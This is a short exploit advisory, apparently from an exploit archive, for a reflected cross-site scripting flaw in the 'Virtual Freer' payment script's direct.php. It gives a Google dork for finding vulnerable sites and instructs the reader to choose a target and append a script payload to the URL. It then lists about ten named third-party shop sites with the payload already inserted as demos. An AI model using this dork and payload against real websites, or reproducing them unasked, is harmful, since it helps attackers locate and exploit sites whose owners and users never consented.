############In The Name Of God############
# Exploit Title : Virtual Freer Cross Site Scripting
# Exploit Author : R4SOUL
# Vendor Homepage : http://freer.ir/
# Google Dork : site:.ir inurl:direct.php?card=
# Date: 2016 26 January
# Tested On : Win 10 / Mozilla Firefox
###########################################
# Exploit:
# Search dork and choose a target and add "'"<script>alert('R4SOUL')</script>" after URL!
# To see Vulnerability!
###########################################
#
# demos :
# http://inet2.ir/direct.php?card=9&qty=1'"<script>alert('R4SOUL')</script>
# http://www.milanvpn50.tk/boy/direct.php?qty=1'"<script>alert('R4SOUL')</script>&card=16
# http://www.nextvpn.in/pay/direct.php?card=2&qty=1'"<script>alert('R4SOUL')</script>
# http://pay.freer.ir/direct.php?card=5&qty=1'"<script>alert('R4SOUL')</script>
# http://www.sabzandishan.ir/shop/direct.php?card=64&qty=1'"<script>alert('R4SOUL')</script>
# http://shop.mihannod.ir/direct.php?card=15&qty=1'"<script>alert('R4SOUL')</script>
# http://www.nextvpn.in/pay/direct.php?card=2&qty=1'"<script>alert('R4SOUL')</script>
# http://store.parseset.ir/direct.php?card=3&qty=1'"<script>alert('R4SOUL')</script>
# http://www.keriomaker020.in/buy/direct.php?card=1&qty=1'"<script>alert('R4SOUL')</script>
# http://tx166.ir/shop/direct.php?card=25&qty=1%27%22%3Cscript%3Ealert(%27R4SOUL%27)%3C/script%3E
###########################################